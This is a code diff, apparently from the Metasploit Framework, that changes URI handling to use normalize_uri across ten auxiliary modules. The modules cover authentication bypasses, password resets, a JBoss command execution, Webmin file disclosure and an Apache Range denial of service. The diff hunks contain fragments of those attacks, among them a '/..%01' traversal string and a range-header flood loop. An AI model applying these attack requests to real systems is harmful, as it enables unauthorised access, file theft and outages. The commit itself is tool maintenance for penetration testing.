sempervictus
diff --git a/‎modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
Lines changed: 2 additions & 1 deletion b/‎modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
Lines changed: 2 additions & 1 deletion
diff --git a/‎modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
Lines changed: 1 addition & 1 deletion b/‎modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
Lines changed: 1 addition & 1 deletion
diff --git a/‎modules/auxiliary/admin/http/iis_auth_bypass.rb
Lines changed: 2 additions & 2 deletions b/‎modules/auxiliary/admin/http/iis_auth_bypass.rb
Lines changed: 2 additions & 2 deletions
diff --git a/‎modules/auxiliary/admin/http/intersil_pass_reset.rb
Lines changed: 1 addition & 1 deletion b/‎modules/auxiliary/admin/http/intersil_pass_reset.rb
Lines changed: 1 addition & 1 deletion
diff --git a/‎modules/auxiliary/admin/http/jboss_seam_exec.rb
Lines changed: 1 addition & 1 deletion b/‎modules/auxiliary/admin/http/jboss_seam_exec.rb
Lines changed: 1 addition & 1 deletion
diff --git a/‎modules/auxiliary/admin/http/scrutinizer_add_user.rb
Lines changed: 2 additions & 1 deletion b/‎modules/auxiliary/admin/http/scrutinizer_add_user.rb
Lines changed: 2 additions & 1 deletion
diff --git a/‎modules/auxiliary/admin/http/typo3_sa_2009_001.rb
Lines changed: 2 additions & 2 deletions b/‎modules/auxiliary/admin/http/typo3_sa_2009_001.rb
Lines changed: 2 additions & 2 deletions
diff --git a/‎modules/auxiliary/admin/tikiwiki/tikidblib.rb
Lines changed: 2 additions & 1 deletion b/‎modules/auxiliary/admin/tikiwiki/tikidblib.rb
Lines changed: 2 additions & 1 deletion
diff --git a/‎modules/auxiliary/admin/webmin/file_disclosure.rb
Lines changed: 2 additions & 1 deletion b/‎modules/auxiliary/admin/webmin/file_disclosure.rb
Lines changed: 2 additions & 1 deletion
diff --git a/‎modules/auxiliary/dos/http/apache_range_dos.rb
Lines changed: 1 addition & 1 deletion b/‎modules/auxiliary/dos/http/apache_range_dos.rb
Lines changed: 1 addition & 1 deletion
@@ -79,8 +79,9 @@ def run_host(ip)
 		print_status("Issuing password change request for: " + datastore['USERNAME'])
 
 		begin
+			uri = normalize_uri(datastore['TARGETURI'])
 			res = send_request_cgi({
-				'uri'     => target_uri.path,
+				'uri'     => uri,
 				'method'  => 'POST',
 				'data'    => data,
 				'headers' =>
 
@@ -48,7 +48,7 @@ def run_host(ip)
 			res = send_request_raw(
 				{
 					'method'  => 'POST',
-					'uri'     => datastore['URL'] + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
+					'uri'     => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
 				}, 25)
 
 			if (res and res.code == 500)
 
@@ -43,7 +43,7 @@ def initialize(info = {})
 
 
 	def has_auth
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1, 1] != '/'
 
 		res = send_request_cgi({
@@ -56,7 +56,7 @@ def has_auth
 	end
 
 	def try_auth
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1, 1] != '/'
 		uri << Rex::Text.rand_text_alpha(rand(10)+5) + ".#{Rex::Text.rand_text_alpha(3)}"
 
 
@@ -73,7 +73,7 @@ def run
 		@peer = "#{rhost}:#{rport}"
 		return if check != Exploit::CheckCode::Vulnerable
 
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({
 
@@ -42,7 +42,7 @@ def initialize(info = {})
 	end
 
 	def run
-		jbr = datastore['JBOSS_ROOT']
+		jbr = normalize_uri(datastore['JBOSS_ROOT'])
 		cmd_enc = ""
 		cmd_enc << Rex::Text.uri_encode(datastore["CMD"])
 
 
@@ -45,9 +45,10 @@ def initialize(info = {})
 	end
 
 	def run
+		uri = normalize_uri(target_uri.path)
 		res = send_request_cgi({
 			'method'    => 'POST',
-			'uri'       => target_uri.path,
+			'uri'       => uri,
 			'vars_post' => {
 				'tool'              => 'userprefs',
 				'newUser'           => datastore['USERNAME'],
 
@@ -68,6 +68,7 @@ def run
 	# Null byte fixed in PHP 5.3.4
 	#
 
+    uri = normalize_uri(datastore['URI'])
 	case datastore['RFILE']
 	when nil
 		# Nothing
@@ -100,8 +101,7 @@ def run
 		juhash = Digest::MD5.hexdigest(juarray)
 		juhash = juhash[0..9] # shortMD5 value for use as juhash
 
-		file_uri = "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
-		file_uri = file_uri.sub("//", "/") # Prevent double // from appearing in uri
+		file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
 		vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")
 
 		begin
 
@@ -52,7 +52,8 @@ def initialize(info = {})
 	def run
 		print_status("Establishing a connection to the target...")
 
-		rpath = datastore['URI'] + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
+        uri = normalize_uri(datastore['URI'])
+		rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
 
 		res = send_request_raw({
 			'uri'     => rpath,
 
@@ -70,7 +70,8 @@ def initialize(info = {})
 	def run
 		print_status("Attempting to retrieve #{datastore['RPATH']}...")
 
-		uri = Rex::Text.uri_encode(datastore['DIR']) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
+        dir = normalize_uri(datastore['DIR'])
+		uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
 
 		res = send_request_raw({
 			'uri'            => uri,
 
@@ -50,7 +50,7 @@ def initialize(info = {})
 	end
 
 	def run
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		ranges = ''
 		for i in (0..1299) do
 			ranges += ",5-" + i.to_s
Original file line number	Diff line number	Diff line change
`@@ -48,7 +48,7 @@ def run_host(ip)`
`48`	`48`	`res = send_request_raw(`
`49`	`49`	`{`
`50`	`50`	`'method' => 'POST',`
`51`		`- 'uri' => datastore['URL'] + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],`
	`51`	`+ 'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],`
`52`	`52`	`}, 25)`
`53`	`53`
`54`	`54`	`if (res and res.code == 500)`